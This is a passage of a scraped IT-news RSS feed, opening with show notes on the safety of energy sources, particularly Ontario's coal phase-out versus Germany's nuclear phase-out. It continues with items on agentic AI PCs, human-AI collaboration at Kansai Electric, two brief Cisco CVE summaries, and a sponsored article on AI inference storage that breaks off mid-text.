In 2003 Ontario decided to close all of its coal fired generating plants, which consisted of 19 units (that is boilers and turbines) totalling 8,800 MW.</p>

<p>
This phase out was completed by 2014.</p>

<p>

</p>

<p>
85</p>

<p>
Here are the figures for amount of power generated by each energy source in 2003 and 2014.</p>

<p>
Nuclear went from 42% to 60%</p>

<p>
Hydro went from 23% to 24%</p>

<p>
Gas went from 11% to 9%</p>

<p>
Coal went from 25% to 0%</p>

<p>
Non-hydro renewable went from 0% to 7%.</p>

<p>

</p>

<p>
86</p>

<p>
As you can see, the bulk of that replacement came from increased use of nuclear power. </p>

<p>
Furthermore, this did not result in simply replacing coal with natural gas.</p>

<p>
While gas is cleaner than coal, it still has emissions and if you recall from the studies that we looked at earlier, had an estimated death rate roughly 2 orders of magnitude greater than nuclear, solar, or wind.</p>

<p>

</p>

<p>
87</p>

<p>
To put this in more practical terms, at one time Toronto regularly had clouds of smog obscuring it, to a large extent due to these coal fired power plants</p>

<p>

</p>

<p>
With the phase out of coal, smog days went to zero in 2015 compared to 53 a decade earlier.</p>

<p>

</p>

<p>
The 2023 figures for Ontario show carbon emissions of 53 grams per kWh of electricity generated.</p>

<p>
We can use this as a rough benchmark comparison for total emissions.</p>

<p>

</p>

<p>

</p>

<p>
88 The Phase out of Nuclear in Germany</p>

<p>
Until March of 2011, Germany generated one quarter of its electrical power from nuclear.</p>

<p>
Starting in 2011 however, they began shutting down their nuclear power plants.</p>

<p>
These were then phased out over the next decade.</p>

<p>
However, the coal plants were to be kept to 2038.</p>

<p>
In 2026 Germany began talking about increasing use of coal in order to save gas.</p>

<p>
In the same year the German chancellor Friedrich Merz stated that the phase out of nuclear was a </p>

<p>
quote  “serious strategic mistake”.</p>

<p>
EU Commission President Ursula von der Leyen said it was "a strategic mistake for Europe to turn its back on a reliable, affordable source of low-emissions power".</p>

<p>

</p>

<p>
89</p>

<p>
I won't go into the details of the phase out, but let's look at some emissions numbers for Germany.</p>

<p>
If we look at the official numbers from the European Environmental Agency for 2024, for Germany their emissions were 298 grams per kWh of electricity generated.</p>

<p>

</p>

<p>
Recall that we are using emissions as a very rough guide to amount of air pollution, and that this has a direct effect on the safety of the overall electrical energy system.</p>

<p>

</p>

<p>
90</p>

<p>
So, who actually made their people safer, Ontario who phased out their coal plants and kept their nuclear plants, or Germany who phased out their nuclear plants and kept their coal plants?</p>

<p>

</p>

<p>
91</p>

<p>
If you want a comparison directly within Europe, then Germany has one of the highest rates of emissions per kWh of electricity generated, whereas France, who use mainly nuclear power, have one of the lowest at 43 grams per kWh of electricity generated.</p>

<p>

</p>

<p>
Again, who is making their people safer, Germany or France?</p>

<p>

</p>

<p>
92</p>

<p>
I don't want to make it sound like I am picking on Germany.</p>

<p>
I am also not going to tell them how they ought to run their country. </p>

<p>
However they provide a good real world example of how we need to look at things in overall context when we are thinking about the choices that we make. </p>

<p>

</p>

<p>

</p>

<p>
https://www.ontario.ca/page/end-coal</p>

<p>
https://www.cbc.ca/news/canada/windsor/smog-study-shows-significant-decreases-in-pollutants-in-ontario-1.4151183</p>

<p>

</p>

<p>
https://www.eea.europa.eu/en/analysis/indicators/greenhouse-gas-emission-intensity-of-1</p>

<p>
https://world-nuclear.org/information-library/country-profiles/countries-g-n/germany</p>

<p>

</p>

<p>
https://www.politico.eu/article/friedrich-merz-is-right-to-reject-germanys-nuclear-phase-out-says-iea-chief-fatih-birol/</p>

<p>

</p>

<p>
https://www.politico.eu/article/germany-considers-ramping-up-coal-power-to-avert-energy-crisis/</p>

<p>

</p>

<p>
https://www.iea.org/countries/estonia/electricity</p>

<p>
https://www.iea.org/countries/malta/electricity</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>
 </p>

<p>
93 Conclusions</p>

<p>
As we can see, there don't appear to be an abundance of peer reviewed scientific studies that we can simply point to in order to answer the question of safety of all possible major different energy sources once and for all.</p>

<p>

</p>

<p>
Collecting the data to even attempt to answer the question is inherently very difficult as we cannot readily conduct experiments to answer the question, and sources of data are not collected or consolidated in a manner which can answer this question adequately.</p>

<p>

</p>

<p>
94</p>

<p>
The essence of the problem is that most energy industries are not as tightly regulated and monitored to the same degree that say nuclear power or commercial airliners are, so this data is simply not being systematically recorded.</p>

<p>

</p>

<p>
However, a number of people have attempted to make estimates.</p>

<p>

</p>

<p>
95</p>

<p>
Their conclusions would seem to be that nuclear, wind, and solar are roughly equivalent in terms of safety.</p>

<p>
All fossil fuels are much less safe than nuclear, wind, and solar, by as much as several orders of magnitude.</p>

<p>

</p>

<p>
96</p>

<p>
We can however say with a reasonable degree of certainty that if a country shut down their nuclear power plants and kept their fossil fuel plants, particularly coal, then they probably made their people less safe than if they had done things the other way around. </p>

<p>

</p>

<p>
97</p>

<p>
I hope that I have provided some context in which to think about the issue. </p>

<p>

</p>

<p>
Thanks again to brian in ohio for providing the question upon which this episode is based.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4668/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fans are selling fast — I'm an appliance expert, and I've found the best air quality and kitchen appliance deals still available to keep you cool in the UK's heatwave]]></title>
<description><![CDATA[I've scoured Amazon's UK Prime Day sales to find the best devices to keep cool in the heatwave; here are my top picks]]></description>
<link>https://tsecurity.de/de/3618878/it-nachrichten/fans-are-selling-fast-im-an-appliance-expert-and-ive-found-the-best-air-quality-and-kitchen-appliance-deals-still-available-to-keep-you-cool-in-the-uks-heatwave/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618878/it-nachrichten/fans-are-selling-fast-im-an-appliance-expert-and-ive-found-the-best-air-quality-and-kitchen-appliance-deals-still-available-to-keep-you-cool-in-the-uks-heatwave/</guid>
<pubDate>Tue, 23 Jun 2026 18:19:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I've scoured Amazon's UK Prime Day sales to find the best devices to keep cool in the heatwave; here are my top picks]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Agentic AI’ PCs? Not much new here, say analysts]]></title>
<description><![CDATA[Nvidia and Microsoft this month touted the reinvention of computers with a new class of “agentic AI PCs” that will “reinvent the way PCs work.” 



That’s how Nvidia CEO Jensen Huang described the computers at the recent Computex trade show. At the event, Nvidia introduced its first AI-focused PC...]]></description>
<link>https://tsecurity.de/de/3618182/it-nachrichten/agentic-ai-pcs-not-much-new-here-say-analysts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618182/it-nachrichten/agentic-ai-pcs-not-much-new-here-say-analysts/</guid>
<pubDate>Tue, 23 Jun 2026 14:03:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nvidia and Microsoft this month touted the reinvention of computers with a new class of “agentic AI PCs” that will “reinvent the way PCs work.” </p>



<p>That’s how Nvidia CEO Jensen Huang described the computers at the recent <a href="https://www.computextaipei.com.tw/en/index.html" data-type="link" data-id="https://www.computextaipei.com.tw/en/index.html" target="_blank" rel="noreferrer noopener">Computex trade show</a>. At the event, Nvidia introduced its first AI-focused PC chip called N1X, which has an integrated CPU and GPU and will be used in agentic AI PCs.</p>



<p>Nvidia’s new <a href="https://www.computerworld.com/article/4180451/rtx-spark-may-split-the-ai-pc-market-into-mainstream-laptops-and-premium-workstations.html" data-type="link" data-id="https://www.computerworld.com/article/4180451/rtx-spark-may-split-the-ai-pc-market-into-mainstream-laptops-and-premium-workstations.html">RTX Spark PCs</a> are the first in a major “PC reinvention for 40 years,” Huang said, likening them to AI phones. “You could talk to it, it could look at you. You could ask it to read files… [or] go help you do research.”</p>



<p>Not so fast, say analysts, who argue the computers are mostly <a href="https://www.computerworld.com/article/4047019/ai-pcs-to-surge-claiming-over-half-the-market-by-2026.html">repackaged AI PCs</a> that shouldn’t necessarily drive enterprise upgrades.</p>



<p>“Agentic AI PCs is a strange term that should probably be deemphasized,” said <a href="https://next-curve.com/thought-leaders/leonard-lee/" data-type="link" data-id="https://next-curve.com/thought-leaders/leonard-lee/" target="_blank" rel="noreferrer noopener">Leonard Lee</a>, principal analyst at neXt Curve. “Depending on use case, PCs of the last two generations are ‘agentic AI’-capable.”</p>



<p>Skeptical of the hype, analysts said many current PCs are already capable of running agents, such as those spun up on device by <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" data-type="link" data-id="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html">OpenClaw</a>. Those agents don’t need to communicate with AI models in the cloud.</p>



<p>In fact, Lee said, Apple has already shown that Windows isn’t needed to run agentic workloads, with the Mac Mini among the most talked-about device for hosting personal AI agents and OpenClaw.</p>



<p>Analysts said the definition of agentic AI PCs really comes down to the hardware inside, which largely defines their capabilities. Most are really just an evolution of earlier AI PCs, which arrived a few years ago amid similar hype.</p>



<p>AI PCs, specifically CoPilot+ PCs, were originally designed with neural processing units (NPUs) to support the requirements of Windows Recall. “Some argue agentic AI PCs need more GPU compute, but…Qualcomm and Microsoft would counter that agentic AI PCs have been around for a while,” Lee said.</p>



<p>To highlight the capabilities of the RTX Spark PC, a demonstration at Computex showed how an architectural design workflow could be split between the PC and the cloud. (An MCP server managed data exchange to facilitate the cloud-PC workflow.)</p>



<p>Adobe has reengineered Photoshop and Premiere for RTX Spark PCs, allowing the software to communicate with AI agents on PCs and tools to run twice as fast, Huang said.</p>



<p>And at the company’s recent <a href="https://build.microsoft.com/en-US/home" data-type="link" data-id="https://build.microsoft.com/en-US/home" target="_blank" rel="noreferrer noopener">Build conference</a>, Microsoft CEO Satya Nadella demonstrated the new Surface Laptop Ultra AI PC based on the RTX Spark design. He positioned agentic AI PCs as running a new execution layer that can act across files and devices, including generating and executing code. </p>



<p>While AI PCs with agents will be capable, they still lack applications, said <a href="https://tiriasresearch.com/team/jim-mcgregor/" data-type="link" data-id="https://tiriasresearch.com/team/jim-mcgregor/" target="_blank" rel="noreferrer noopener">Jim McGregor</a>, principal analyst at Tirias Research. “However, PCs — especially the small form factor PCs and workstations — are likely to be the home AI appliance,” he said.</p>



<p>For enterprises, upgrading to RTX Spark PCs at this point could pose problems. That’s because Nvidia’s N1X CPU is based on the Arm processor architecture and could run into compatibility issues with x86 applications designed for Intel and AMD chips.</p>



<p>“Despite Arm processors being available for a while, enterprise penetration stays small, since compatibility with all apps, drivers, and corporate systems is critical and requires extensive testing…, even though Microsoft has done a reasonably good job with Windows 11 on Arm,” said Jack Gold, principal analyst at <a href="https://jgoldassociates.com/" data-type="link" data-id="https://jgoldassociates.com" target="_blank" rel="noreferrer noopener">J. Gold Associates</a>.</p>



<p>Because Microsoft is moving to natively incorporate AI into Windows, those PCs will land in enterprises ultimately, Gold said.</p>



<p>Regardless of hype, it might be a good time for enterprises chasing an agentic AI agenda to upgrade laggard Windows 10 devices, Lee said. “Considering the considerable hype about agentic AI, early adopters will need to upgrade their fleets if they pursue a broad agentic AI agenda for their organizations,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Successful AI adoption lies in collaboration, not replacement]]></title>
<description><![CDATA[Due to the rapid evolution of generative AI in recent years, many companies are accelerating their adoption of AI. Specifically, the scope of AI’s integration into day-to-day operations is steadily expanding, covering tasks such as minute-taking, summarization, searching, responding to inquiries,...]]></description>
<link>https://tsecurity.de/de/3617665/it-nachrichten/successful-ai-adoption-lies-in-collaboration-not-replacement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617665/it-nachrichten/successful-ai-adoption-lies-in-collaboration-not-replacement/</guid>
<pubDate>Tue, 23 Jun 2026 11:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Due to the rapid evolution of generative AI in recent years, many companies are accelerating their adoption of AI. Specifically, the scope of AI’s integration into day-to-day operations is steadily expanding, covering tasks such as minute-taking, summarization, searching, responding to inquiries, and drafting documents — all of which are typically performed by white-collar workers in office settings. At the same time, however, as discussions about AI adoption intensify, questions and concerns are emerging in society, such as “What will happen to human jobs?” and “To what extent should we entrust tasks to AI?”</p>



<p>My own fundamental premise when considering the roles of humans and AI is that AI should not be viewed merely as a tool for improving efficiency. The core issue that a CIO must fundamentally address is not which tasks to introduce AI into, but rather to thoroughly consider what roles humans and AI should each play, how they can complement one another, and how they can enhance each other to create new value that was previously unattainable.<br><br></p>



<p><a href="https://www.kepco.co.jp/english/corporate/list/report/pdf/ar2025_e_18.pdf" rel="nofollow">The Kansai Electric Power Group’s DX Vision 2035 — as part of its DX and AI strategy</a> — has clearly defined its vision as continuing to create new value through AI-driven transformation, with people collaborating with AI. The underlying philosophy is that the use of AI is by no means merely an improvement along the lines of conventional practices; rather, it aims to achieve a fundamental restructuring of business, operations, and work styles.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/dx-vision-2035.png?w=1024" alt="DX Vision 2035" class="wp-image-4187946" width="1024" height="568" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p>Thus, collaboration between humans and AI does not mean replacing part of the work with AI but rather identifying the strengths of both humans and AI, and restructuring workflows, decision-making, and value delivery. I believe that only when this is achieved will AI evolve from a mere convenient tool into an indispensable weapon for corporate transformation.</p>



<h2 class="wp-block-heading">What is AI good at, and what should humans take on?</h2>



<p>The starting point for considering human-AI collaboration is to objectively assess the areas in which each excels.</p>



<p>AI excels at rapidly analyzing, processing, searching, and summarizing large volumes of information, presenting multiple options, and making inferences and evaluations based on established patterns. For example, gathering external information, drafting documents, preparing meeting minutes, reviewing contracts, responding to inquiries and creating preliminary risk assessments are areas where AI can demonstrate significant strength.</p>



<p>In fact, at Kansai Electric Power, the use of AI is accelerating across a wide range of use cases, including AI-powered compliance checks, AI critic agents for meeting agenda items, AI risk assessment agents for investment projects, the enhancement of the internal help desk through AI, and the overall reform of corporate sales processes through AI.</p>



<p>On the other hand, I believe that in the age of AI, humans should assume four key roles:</p>



<ol class="wp-block-list">
<li>Formulating questions</li>



<li>Interpreting meaning</li>



<li>Making decisions</li>



<li>Taking responsibility for the results</li>
</ol>



<p>While AI can present a vast number of options, it cannot bear the responsibility for making judgments such as “What do we value?” or “What should this company choose?” This is particularly true in the fields of management, customer service, and organizational operations, where factors such as ethics, trust, emotions, and the balancing of interests come into play. In such contexts, human will is ultimately the guiding principle.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/role-of-humans.png?w=1024" alt="The role of humans in the age of AI" class="wp-image-4187945" width="1024" height="524" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p>In other words, humans are the ones who decide what questions to ask and what choices to make, while AI is, at best, a tool that quickly produces processing results. If we proceed with AI adoption while blurring this division of roles, it will lead to confusion on the front lines. Conversely, if this distinction is clearly established, AI implementation will not undermine front-line capabilities but will instead enhance human capabilities.</p>



<h2 class="wp-block-heading">Collaboration is not about division of labor but mutual reinforcement</h2>



<p>An important point to note here is that collaboration between humans and AI cannot be achieved simply by creating a basic division of labor chart. What matters is designing a relationship in which both parties draw out and enhance each other’s strengths.</p>



<p>Kiichiro Toyoda, the founder of Toyota Motor Corporation, once said, “Machines become complete when they become one with humans.” If we replace machines with AI in this quote, it becomes “AI becomes complete when it becomes one with humans.” I believe this expresses a timeless concept that remains fully relevant even in today’s AI- era.</p>



<p>So, what are the different patterns of human-AI collaboration? Below, I’ve created a four-quadrant matrix chart that categorizes how humans work based on Science vs. Art (horizontal axis) and Individual vs. Collaborative (vertical axis).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/human-ai-collaboration.png?w=1024" alt="What is human-AI collaboration?" class="wp-image-4187947" width="1024" height="564" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p>For example:</p>



<ul class="wp-block-list">
<li>[Quadrant D] Science × Individual Work ⇒ Tasks are entrusted to AI and robots.</li>



<li>[Quadrant C] Art × Performed Individually ⇒ AI expands human creativity.</li>



<li>[Area B] Science × Individually ⇒ Humans and AI collaborate</li>



<li>[Domain A] Art × carried out collaboratively by multiple people ⇒ Carried out primarily by humans; AI serves as a sounding board</li>
</ul>



<p>This is the breakdown.</p>



<p>The accuracy of AI’s output changes significantly depending on the quality of the questions humans pose to it. Conversely, when AI anticipates needs by organizing key points and gathering information, humans can devote their time to making more fundamental decisions. At Kansai Electric Power, a proof of concept (PoC) is underway to utilize AI agents for brainstorming management decisions, risk assessment, and stimulating discussion. This initiative is being pursued not with the idea of handing over work entirely to AI, but rather with the concept that AI extends human thinking and enhances the quality and speed of human decision-making.</p>



<p>As this collaboration progresses, the very nature of work will change.AI will take on the tasks of gathering, organizing, and analyzing information — tasks that humans previously spent a great deal of time on — allowing humans to focus on formulating questions and hypotheses, engaging with customers, being creative, building consensus, and making final decisions. As a result, we will see not just a reduction in man-hours, but an improvement in the quality and speed of work.</p>



<p>Thus, I believe we are moving toward a world where people and companies that make full use of AI will succeed, while people and companies that do not use AI will fall behind — not a world where AI takes people’s jobs.</p>



<p>The fundamental question a CIO should ask is not “What should we have AI do?” but rather “What will people be able to focus on once AI is introduced?” I believe that the ultimate value of collaboration lies not in the adoption rate of AI, but in the enhancement and acceleration of human work.</p>



<h2 class="wp-block-heading">Business process redesign is essential for achieving collaboration</h2>



<p>A common trait among organizations where AI adoption is not progressing as expected is that they introduce AI only to specific parts of their operations without changing the underlying processes or methods of human work. While this may seem like the easiest approach at first glance, it actually results in the least effective use of AI’s capabilities and minimizes the value it can deliver. In short, while JTCs (traditional Japanese companies) think in terms of where to introduce AI based on existing business processes, AIFCs (AI-first companies) rebuild business processes on the premise that AI exists.</p>



<p>To truly realize collaboration between humans and AI, it is necessary to break down the business processes themselves. This involves visualizing the elements within the work—such as problem definition, data collection, organization, decision-making, dialogue, resolution, evaluation, and improvement—and designing and transforming each step to determine whether it should be entrusted to AI, handled by humans, or carried out collaboratively by both. This is not merely the introduction of AI, but the design and transformation of the business, its operations, and its organization.</p>



<p>At Kansai Electric Power, there are use cases such as the transformation of the entire sales process using AI, support for knowledge and technical succession in the thermal power division, support for regulatory compliance checks, and the enhancement of the internal help desk. However, we believe the significance lies in the fact that this is not merely the introduction of AI or partial optimization, but rather the integration of AI after taking a bird’s-eye view of the entire workflow, with the ultimate goal of achieving overall optimization.</p>



<p>Thus, the CIO must act not as the person responsible for AI implementation, but as the architect of business transformation.</p>



<h2 class="wp-block-heading">The CIO is a collaborative designer, not an AI implementation manager</h2>



<p>The role expected of a CIO in the AI era is not merely to drive AI adoption. It is to envision a future where humans and AI work together, and to translate that vision into implementable business processes, systems, rules, and organizational culture.</p>



<p>In this sense, it can be said that the CIO is not an AI implementation manager but a collaborative designer. What should humans specialize in, and in which areas should AI be used? What should humans take on more heavily, and what should they let go of? Continuously answering these questions is the CIO’s essential job.</p>



<p>Moreover, this design is not a one-time effort. As long as AI itself continues to evolve rapidly, the nature of collaboration will also continue to evolve. That is precisely why a CIO should not be the one who provides the right answers, but rather the one who continually asks the right questions. The key is not how much to entrust to AI, but rather what humans should hone in an era where AI exists. Continuously asking this question is what determines a company’s competitiveness.</p>



<h2 class="wp-block-heading">Beyond collaboration lies a relationship where humans and AI enhance each other</h2>



<p>When people hear the term human-AI collaboration, many likely think first of efficiency and increased productivity. However, the true goal lies beyond that. It is not merely about using AI to reduce human workloads but about using AI to expand human potential.</p>



<p>Rather than humans merely mastering AI, we must create a relationship where humans and AI mutually enhance one another. Only when such collaboration becomes firmly established will companies truly gain a competitive advantage in the AI era.</p>



<p>The future that CIOs should envision is not an organization where AI takes away people’s jobs. It is an organization where, with AI as a partner, people can engage with customers and society in a more creative, more meaningful way.</p>



<p>What does collaboration between humans and AI entail?</p>



<p>We must not leave this question vague but rather think it through thoroughly and bring it to fruition.</p>



<p>Is this not the crucial mission entrusted to the CIO in the AI era?</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This 2-Minute Microwave Cleaning Trick Will Make Your Appliance Look Brand New]]></title>
<description><![CDATA[Ditch the cleaning sprays and elbow grease and try this simple trick instead.]]></description>
<link>https://tsecurity.de/de/3616978/it-nachrichten/this-2-minute-microwave-cleaning-trick-will-make-your-appliance-look-brand-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616978/it-nachrichten/this-2-minute-microwave-cleaning-trick-will-make-your-appliance-look-brand-new/</guid>
<pubDate>Tue, 23 Jun 2026 02:47:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ditch the cleaning sprays and elbow grease and try this simple trick instead.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-20922 | Cisco Cyber Vision Snort SMB2 Detection Engine Policy heap inspection (cisco-sa-snort-smb-3nfhJtr)]]></title>
<description><![CDATA[A vulnerability has been found in Cisco Cyber Vision, FirePOWER Services, Firepower Threat Defense, Meraki MX Security Appliance and Umbrella Secure Internet Gateway and classified as problematic. This vulnerability affects unknown code of the component Snort SMB2 Detection Engine Policy. The man...]]></description>
<link>https://tsecurity.de/de/3616243/sicherheitsluecken/cve-2022-20922-cisco-cyber-vision-snort-smb2-detection-engine-policy-heap-inspection-cisco-sa-snort-smb-3nfhjtr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616243/sicherheitsluecken/cve-2022-20922-cisco-cyber-vision-snort-smb2-detection-engine-policy-heap-inspection-cisco-sa-snort-smb-3nfhjtr/</guid>
<pubDate>Mon, 22 Jun 2026 19:24:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/cisco:cyber_vision">Cisco Cyber Vision, FirePOWER Services, Firepower Threat Defense, Meraki MX Security Appliance and Umbrella Secure Internet Gateway</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code of the component <em>Snort SMB2 Detection Engine Policy</em>. The manipulation leads to improper clearing of heap memory before release.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2022-20922">CVE-2022-20922</a>. The attack may be initiated remotely. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2017-12350 | Cisco Umbrella Insights Virtual Appliance up to 2.1.0 Hypervisor hard-coded credentials (cisco-sa-20171115-uva / BID-101879)]]></title>
<description><![CDATA[A vulnerability was found in Cisco Umbrella Insights Virtual Appliance up to 2.1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the component Hypervisor. Performing a manipulation results in hard-coded credentials.

This vulnerability was named CVE-2017-...]]></description>
<link>https://tsecurity.de/de/3616241/sicherheitsluecken/cve-2017-12350-cisco-umbrella-insights-virtual-appliance-up-to-210-hypervisor-hard-coded-credentials-cisco-sa-20171115-uva-bid-101879/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616241/sicherheitsluecken/cve-2017-12350-cisco-umbrella-insights-virtual-appliance-up-to-210-hypervisor-hard-coded-credentials-cisco-sa-20171115-uva-bid-101879/</guid>
<pubDate>Mon, 22 Jun 2026 19:24:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/cisco:umbrella_insights_virtual_appliance">Cisco Umbrella Insights Virtual Appliance up to 2.1.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>Hypervisor</em>. Performing a manipulation results in hard-coded credentials.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2017-12350">CVE-2017-12350</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI hit the memory wall — now it needs a new context tier]]></title>
<description><![CDATA[Presented by SolidigmAs inference workloads evolve from discrete question-and-answer exchanges into persistent, multi-step agentic systems, GPU availability is no longer the most critical AI bottleneck. Instead, the bottleneck has migrated from compute to context, says Jeff Harthorn, AI applied r...]]></description>
<link>https://tsecurity.de/de/3616015/it-nachrichten/ai-hit-the-memory-wall-now-it-needs-a-new-context-tier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616015/it-nachrichten/ai-hit-the-memory-wall-now-it-needs-a-new-context-tier/</guid>
<pubDate>Mon, 22 Jun 2026 17:48:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Solidigm</i></p><hr><p>As inference workloads evolve from discrete question-and-answer exchanges into persistent, multi-step agentic systems, GPU availability is no longer the most critical AI bottleneck. Instead, the bottleneck has migrated from compute to context, says Jeff Harthorn, AI applied research lead at Solidigm.</p><p>"Why context management has become a primary bottleneck, more than GPU availability or compute efficiency, is the question of 2026," says Harthorn. "GPUs have gotten dramatically cheaper per FLOP. Model architectures and inference serving engines have all gotten much more efficient. But the thing that's grown faster than both of those is context. The persistent state that has to live between sessions has grown even faster than context itself."</p><p>It's happening as context windows grow dramatically, making individual inputs far larger than before. Agentic AI systems chain dozens or hundreds of model calls together, each generating state that must be tracked, and enterprises are requiring that inference state persist across sessions for audit, governance, and reuse. These trends compound each other, pushing context volumes beyond what any existing memory tier was designed to handle.</p><p>"Those three things are all happening at the same time, all of which are pushing context data and context memory into the stratosphere much more quickly than we're used to seeing," adds Ace Stryker, director of AI and ecosystem marketing at Solidigm.</p><p>The solution is a dedicated context tier emerging between GPU memory and bulk network storage: a layer of high-performance, high-density flash designed specifically to hold and serve Key-value (KV) cache, the inference data that allows models to retain and reuse context, and retrieval data at inference speed. Nvidia has formalized this architecture under the term CMX. Storage companies including Solidigm are building SSD products optimized for this workload.</p><p>"Storage has not been the first thing folks have thought about when they've been planning their enterprise infrastructure buildout," Stryker says. "In a lot of ways, it was a relatively small cost compared to compute, and it was a commodity. You just shopped around for the lowest dollar per gigabyte and called it good. But now, if your storage is not up to snuff, your ROI suffers, and it directly impacts your bottom line.” </p><h2>Why AI inference requires a different storage architecture than training</h2><p>The storage architecture that AI systems rely on today was largely inherited from training workflows. Training is sequential and write-dominated, with data moving in large blocks to and from bulk object storage. The tier structure, with high-bandwidth memory on the GPU, fast NVMe in the server, and bulk storage over the network, serves that use case reasonably well.</p><p>However, inference is a different animal. Its I/O signature is fine-grained, latency-sensitive, and increasingly stateful. KV cache data and retrieval data each have distinct access patterns, but both need to be served quickly and reused across interactions. Neither fits cleanly within GPU high-bandwidth memory, which is expensive and physically constrained, nor within traditional bulk storage, which was never designed for active inference workloads.</p><p>"The architectural gap that's interesting to me right now isn't at the top of the stack or the bottom, it's right in the middle," Harthon says. "A lot of what sits below the GPU HBM is being asked to do things it wasn't really designed for, which is where the most interesting systems work today is happening."</p><p>One of the most visible symptoms of this gap is recomputation. In inference, the pre-fill stage processes all of the context relevant to a given session before token generation can begin. When KV cache state isn't available in a fast, accessible tier, the system recomputes it — burning GPU cycles that produce no new value.</p><p>"A meaningful share of GPU cycles end up going to re-pre-filling," Harthon explains. "During all of that calculated context, that's potentially compute that's being spent reproducing state, rather than doing new work. When you start looking at the problem that way, GPU utilization starts looking like it's partly a storage problem."</p><p>This reframing is driving renewed interest in a metric borrowed from networking: goodput, or useful tokens per dollar, rather than raw tokens per dollar.</p><h2>The AI context memory tier and how it works</h2><p>The industry's response is taking structural form. A new tier is emerging between GPU memory and traditional network storage, designed specifically to hold and serve inference context, a layer distinct from drives inside GPU servers (G3) and storage servers over the network (G4), engineered to serve context data back to accelerators as rapidly as possible.</p><p>"If you're building a data center starting in the second half of this year, or the beginning of next year, you can't think about storage only living in two places," Stryker says. "Storage has to live in at least three places to handle the context memory tier, and that's likely to be a permanent fixture in how the infrastructure gets built going forward."</p><p>It's analogous to the emergence of object storage as a category, which didn't exist until enough workloads needed it. And once it did, it developed its own primitives, SLAs, cost models, and an ecosystem of vendors. </p><p>"The context tier looks like it might be on a similar arc," Harthorn says. "That volumetric pressure is causing the category to form, rather than any one vendor's road map."</p><p>For infrastructure leaders, this means actively planning for the new tier rather than treating it as optional. Deploying additional NAND at this layer reduces dependency on DRAM, which is orders of magnitude more expensive per gigabyte and constrained in both availability and thermal headroom. </p><p>"In terms of your investment effectiveness, you're laying out less cash to do it if you rely on the SSD layer in the way that Nvidia is now recommending and prescribing for a lot of use cases," Stryker adds.</p><h2>What flash needs to deliver to support AI inference</h2><p>Participating meaningfully in the inference stack places new demands on SSD technology. Tail latency, the worst-case performance of a drive, must be predictable, not just fast on average. An orchestration system that allocates GPU resources based on expected storage response times cannot tolerate unexpected multi-second delays. 